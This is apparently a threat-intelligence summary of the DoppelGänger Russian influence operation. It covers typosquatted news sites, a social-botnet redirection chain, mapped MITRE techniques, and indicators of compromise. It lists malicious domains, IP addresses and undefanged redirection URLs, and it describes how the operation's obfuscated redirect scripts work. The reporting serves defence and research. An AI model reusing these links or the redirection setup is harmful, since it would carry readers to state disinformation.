DoppelGänger is a long-running Russian influence operation that targets Western audiences to undermine support for Ukraine and sow societal divisions, using a two-tier network of typosquatted and independent news sites amplified by inauthentic social media accounts across X, Facebook, Instagram, TikTok, YouTube, and more. It employs a multilayer redirection infrastructure and a parallel Russian-speaking cluster, with attribution to Structura National Technologies (Structura) and the Social Design Agency (SDA). #DoppelGanger #Structura
Keypoints
- The DoppelGänger campaign is an ongoing influence operation, active since 2022 and attributed to Russia (Structura and SDA).
- The primary goal is to diminish support for Ukraine and to sow divisions in Western democracies; targets include France, Germany, Ukraine, the United States, and others.
- It relies on a network of two types of websites—typosquatted legitimate outlets and independent news sites—to publish disinformation articles.
- Disinformation is disseminated via inauthentic social accounts across multiple platforms, with Keitaro used to monitor campaign effectiveness.
- The infrastructure features a three-stage redirection process: stage 0 social botnet, stage 1 URL/websites, stage 2/3 redirection toward disinformation sites; metadata/thumbnails are generated for social platforms.
- A new Russian-speaking cluster suggests a possible additional objective, potentially tied to Russian domestic propaganda missions for Moscow.
MITRE Techniques
- [T1566.002] Spearphishing Link – The first stage social botnet posts inciting curious users to click on the given link. “The redirection chain starts by a simple post or ad on social media where the target audience is present.”
- [T1583] Acquire Infrastructure – The campaign uses cheap domain names from uncommon TLDs and bulletproof hosting to support the operation. “The first stage website uses cheap domain names from uncommon TDLs such as .click, .online or .buzz. Sekoia analysts observed a few hundred of these domains, and a random subdomain is generated on one of them for every shared article. Most of these domains were created between March and October 2023 and are hosted on Russian-related AS and some bulletproof hosters.”
- [T1036] Masquerading – Typosquatted legitimate websites are used to enhance credibility of narratives. “Within the first category, various legitimate websites have been typosquatted to enhance the credibility of purported narratives by associating them with trusted sources.”
- [T1027] Obfuscated/Deobfuscated Files or Information – Stage 2/3 rely on obfuscated scripts, including base64 encoding, to perform redirection. “The code of the stage 2 pages is simple and ends with a base64 encoded and lightly obfuscated script which is decoded and executed when the page is loaded into the user’s browser.”
- [T1059] Command and Scripting Interpreter – The obfuscated script loads additional content by creating a new script tag with a src attribute. “The script creates a new script tag in the HTML page with a src attribute, allowing it to get its content from a specific URL.”
Indicators of Compromise
- [Domain] – Domains used for the network and redirection: newsroad.online, docnanb.com, and other typosquatted/independent sites.
- [IP Address] – Hosting servers for the infrastructure: 178.62.255.247, 206.189.243.184.
- [URL] – Stage-1/Stage-2 redirection URLs: http://a8czwp.gituyahmainnya18.click/s8yrcy, http://docnanb.com/holy9180238
- [File name] – WordPress XML-RPC endpoint: xmlrpc.php (and related pingback mechanism like pingback.ping)
Read more: https://blog.sekoia.io/master-of-puppets-uncovering-the-doppelganger-pro-russian-influence-campaign/